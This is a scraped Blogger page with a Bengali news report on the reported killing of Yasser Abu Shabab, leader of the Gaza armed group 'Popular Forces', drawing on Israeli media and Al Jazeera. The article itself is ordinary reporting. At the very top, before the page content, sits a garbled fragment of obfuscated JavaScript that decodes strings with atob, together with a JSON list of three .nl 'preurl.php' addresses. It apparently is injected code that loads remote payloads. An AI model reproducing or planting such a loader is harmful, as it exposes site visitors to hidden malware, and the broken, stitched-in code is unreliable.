/*>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t/* */ { "urls": [ "chaintopdom.nl/script/preurl.php", "smarttopchain.nl/script/preurl.php", "topblockchainsolutions.nl/script/preurl.php" ] } গাজায় বিতর্কিত সশস্ত্র গোষ্ঠীর নেতাকে হত্যা করল ফিলিস্তিনিরা - bd5.blogspot.com

Header Ads ADCASH

গাজায় বিতর্কিত সশস্ত্র গোষ্ঠীর নেতাকে হত্যা করল ফিলিস্তিনিরা

 

গাজায় বিতর্কিত সশস্ত্র গোষ্ঠীর নেতাকে হত্যা করল ফিলিস্তিনিরা


গাজায় বিতর্কিত সশস্ত্র গোষ্ঠীর নেতাকে হত্যা করল ফিলিস্তিনিরা

 


ফিলিস্তিনের গাজা উপত্যকার বিতর্কিত সশস্ত্র সংগঠন ‘পপুলার ফোর্সেস’-এর নেতা ইয়াসির আবু শাবাব নিহত হয়েছেন বলে জানিয়েছে একাধিক ইসরায়েলি সংবাদমাধ্যম। বৃহস্পতিবার প্রথমে ইসরায়েলের চ্যানেল ১৪ এ খবর প্রকাশ করে। পরে চ্যানেল ১২ জানায়, গাজার স্থানীয় গোষ্ঠীগুলোর সঙ্গে সংঘর্ষে আহত হওয়ার পর দক্ষিণ ইসরায়েলের সোরোকা মেডিকেল সেন্টারে তার মৃত্যু ঘটে।

ইসরায়েলের ধারাবাহিক হামলার মধ্যে আবু শাবাবের নাম ব্যাপক আলোচনায় আসে। মানবিক সহায়তা দখল, চাঁদাবাজি এবং হামাসবিরোধী কর্মকাণ্ড—এমন নানা অভিযোগ ছিল তার বিরুদ্ধে। ইসরায়েলি কর্তৃপক্ষ পূর্বে দাবি করে, গাজায় হামাসের প্রভাব কমাতে আবু শাবাবের নেতৃত্বাধীন গোষ্ঠীকে তারা সহায়তা দিয়েছিল।

আলজাজিরার গাজা সিটি প্রতিনিধি হানি মাহমুদ জানান, ঠিক কীভাবে আবু শাবাব নিহত হয়েছেন, তা এখনো স্পষ্ট নয়। তার ভাষ্যে, আবু শাবাব ও তার দল গাজায় মাদক ব্যবসা, ত্রাণবাহী ট্রাক থামিয়ে লুট, এবং উত্তর গাজায় দুর্ভিক্ষে আক্রান্ত মানুষের জন্য পাঠানো সহায়তা আটকে দেওয়ার মতো কর্মকাণ্ডের জন্য কুখ্যাত ছিল।

হামাসের ঘনিষ্ঠ নিরাপত্তা শাখা ‘রাদা’ বৃহস্পতিবার টেলিগ্রামে তার একটি ছবি প্রকাশ করে লিখেছে, “আমরা সতর্ক করেছিলাম—ইসরায়েল তোমাকে বাঁচাবে না।”

এর আগে জুলাইয়ে হামাস-ঘনিষ্ঠ আদালত তাকে বিশ্বাসঘাতকতা, শত্রুপক্ষকে সহায়তা, সশস্ত্র বাহিনী সংগঠিত করা এবং বিদ্রোহ উসকে দেওয়ার অভিযোগে আত্মসমর্পণের জন্য ১০ দিনের সময়সীমা দিয়েছিল। তিনি এর আগেও গাজায় মাদক-সংশ্লিষ্ট অভিযোগে হামাসের হাতে কারাবন্দী ছিলেন।

 

 

No comments

Theme images by suprun. Powered by Blogger.